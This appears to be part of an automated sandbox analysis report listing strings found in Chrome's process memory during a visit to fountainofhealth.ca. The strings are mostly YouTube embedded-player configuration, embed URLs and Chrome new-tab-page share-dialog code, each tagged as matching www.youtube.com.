\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\
Source: chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 18QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: 20QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 3+https://www.youtube.com/generate_204?oFXXFw( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 5https://www.youtube.com/^0https://fountainofhealth.ca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 7https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2301954365.000028EC06804000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000000.00000003.2301954365.000028EC06804000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000000.00000002.2499311995.000028EC0630C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: </div></div></div></div></div><script src=\"/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js\" name=\"embed_client\" id=\"base-js\" nonce=\"NJyqDsAj1TAa8VDP1RD_bg\"></script><script src=\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\" name=\"player/base\" nonce=\"NJyqDsAj1TAa8VDP1RD_bg\"></script><script nonce=\"\">writeEmbed();</script><script nonce=\"\">if (window.ytcsi) {ytcsi.infoGel({serverTimeMs: 43.0 }, '');}</script><noscript><div class=\"player-unavailable\"><h1 class=\"message\">An error occurred.</h1><div class=\"submessage\"><a href=\"https://www.youtube.com/watch?v=h15NcT6UXh0\" target=\"_blank\">Try watching this video on www.youtube.com</a>, or enable JavaScript if it is disabled in your browser.</div></div></noscript></body>","favicon":"","currentUrl":"https://fountainofhealth.ca/en","listArrString":[null,"https://www.youtube.com/watch?v=h15NcT6UXh0","https://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F"],"imgArrString":["https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,AA==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADGCAYAAAAT+OqFAAAAdklEQVQoz42QQQ7AIAgEF/T/D+kbq/RWAlnQyyazA4aoAB4FsBSA/bFjuF1EOL7VbrIrBuusmrt4ZZORfb6ehbWdnRHEIiITaEUKa5EJqUakRSaEYBJSCY2dEstQY7AuxahwXFrvZmWl2rh4JZ07z9dLtesfNj5q0FU3A5ObbwAAAABJRU5ErkJggg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323304427.000028EC06AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/FURi5aHg1g? equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX# equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2342010290.000028EC04DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2499056442.000028EC0621C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/gobWGqPjSQ? equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502877436.000028EC06F59000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?siYrX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486707803.000028EC03A38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491838575.000028EC04094000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/h15NcT6Uh0? equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370719843.000028EC025E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=jsonscriptSource equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331272566.000028EC0578B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: B))):this.api.K().D("enable_adb_handling_in_sabr")&&T==="BROWSER_OR_EXTENSION_ERROR"&&!R.X?(R=R.hostLanguage,B="//support.google.com/youtube/answer/3037019#zippy=%2Cupdate-your-browser-and-check-your-extensions",R&&(B=g.Qn(B,{hl:R})),this.oI(HH(this,"BROWSER_OR_EXTENSION_ERROR",B))):this.oI(g.nu(B.errorMessage)):this.oI(HH(this,"HTML5_NO_AVAILABLE_FORMATS_FALLBACK_WITH_LINK_SHORT","//www.youtube.com/supported_browsers")):(B=R.hostLanguage,T="//support.google.com/youtube/?p=player_error1",B&&(T=g.Qn(T, equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: CLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D","ROOT_VE_TYPE":16623,"CLIENT_PROTOCOL":"h2","CLIENT_TRANSPORT":"tcp","TIME_CREATED_MS":1747926390713,"VALID_SESSION_TEMPDATA_DOMAINS":["youtu.be","youtube.com","www.youtube.com","web-green-qa.youtube.com","web-release-qa.youtube.com","web-integration-qa.youtube.com","m.youtube.com","mweb-green-qa.youtube.com","mweb-release-qa.youtube.com","mweb-integration-qa.youtube.com","studio.youtube.com","studio-green-qa.youtube.com","studio-integration-qa.youtube.com"],"LOTTIE_URL":{"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue":"https://www.youtube.com/s/desktop/fc303b88/jsbin/lottie-light.vflset/lottie-light.js"},"IDENTITY_MEMENTO":{"visitor_data":"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D"},"PLAYER_VARS":{"embedded_player_response":"{\"responseContext\":{\"serviceTrackingParams\":[{\"service\":\"CSI\",\"params\":[{\"key\":\"c\",\"value\":\"WEB_EMBEDDED_PLAYER\"},{\"key\":\"cver\",\"value\":\"1.20250519.22.00\"},{\"key\":\"yt_li\",\"value\":\"0\"},{\"key\":\"GetEmbeddedPlayer_rid\",\"value\":\"0x4915923d623f029d\"}]},{\"service\":\"GFEEDBACK\",\"params\":[{\"key\":\"logged_in\",\"value\":\"0\"}]},{\"service\":\"GUIDED_HELP\",\"params\":[{\"key\":\"logged_in\",\"value\":\"0\"}]},{\"service\":\"ECATCHER\",\"params\":[{\"key\":\"client.version\",\"value\":\"20250519\"},{\"key\":\"client.name\",\"value\":\"WEB_EMBEDDED_PLAYER\"}]}]},\"embedPreview\":{\"thumbnailPreviewRenderer\":{\"title\":{\"runs\":[{\"text\":\"Welcome to Thrive Learning\"}]},\"defaultThumbnail\":{\"thumbnails\":[{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/default.webp\",\"width\":120,\"height\":90},{\"url\":\"https://i.ytimg.com/vi/h15NcT6UXh0/hqdefault.jpg?sqp\u003d-oaymwEbCKgBEF5IVfKriqkDDggBFQAAiEIYAXABwAEG\\u0026rs\u003dAOn4CLDJWTWlcbwcb-bEqBgHid5A-_nY9A\",\"width\":168,\"height\":94},{\"url\":\"https://i.ytimg.com/vi/h15NcT6UXh0/hqdefault.jpg?sqp\u003d-oaymwEbCMQBEG5IVfKriqkDDggBFQAAiEIYAXABwAEG\\u0026rs\u003dAOn4CLDmal8uNjukQFZ7jFGA9LECrFIsyA\",\"width\":196,\"height\":110},{\"url\":\"https://i.ytimg.com/vi/h15NcT6UXh0/hqdefault.jpg?sqp\u003d-oaymwEcCPYBEIoBSFXyq4qpAw4IARUAAIhCGAFwAcABBg\u003d\u003d\\u0026rs\u003dAOn4CLA21q98DV-DLPdugT0We8xLQbvHXg\",\"width\":246,\"height\":138},{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/mqdefault.webp\",\"width\":320,\"height\":180},{\"url\":\"https://i.ytimg.com/vi/h15NcT6UXh0/hqdefault.jpg?sqp\u003d-oaymwEcCNACELwBSFXyq4qpAw4IARUAAIhCGAFwAcABBg\u003d\u003d\\u0026rs\u003dAOn4CLDsrkYEId9-bMHMSBZa-AFuWhtIHg\",\"width\":336,\"height\":188},{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/hqdefault.webp\",\"width\":480,\"height\":360},{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/sddefault.webp\",\"width\":640,\"height\":480},{\"url\":\"https://i.ytimg.com/vi_webp/h15NcT6UXh0/maxresdefault.webp\",\"width\":1920,\"height\":1080}]},\"playButton\":{\"buttonRenderer\":{\"style\":\"STYLE_DEFAULT\",\"size\":\"SIZE_DEFAULT\",\"isDisabled\":false,\"n
Source: chrome.exe, 00000000.00000003.2371291317.000028EC0800B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24
Source: chrome.exe, 00000000.00000002.2508320989.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedP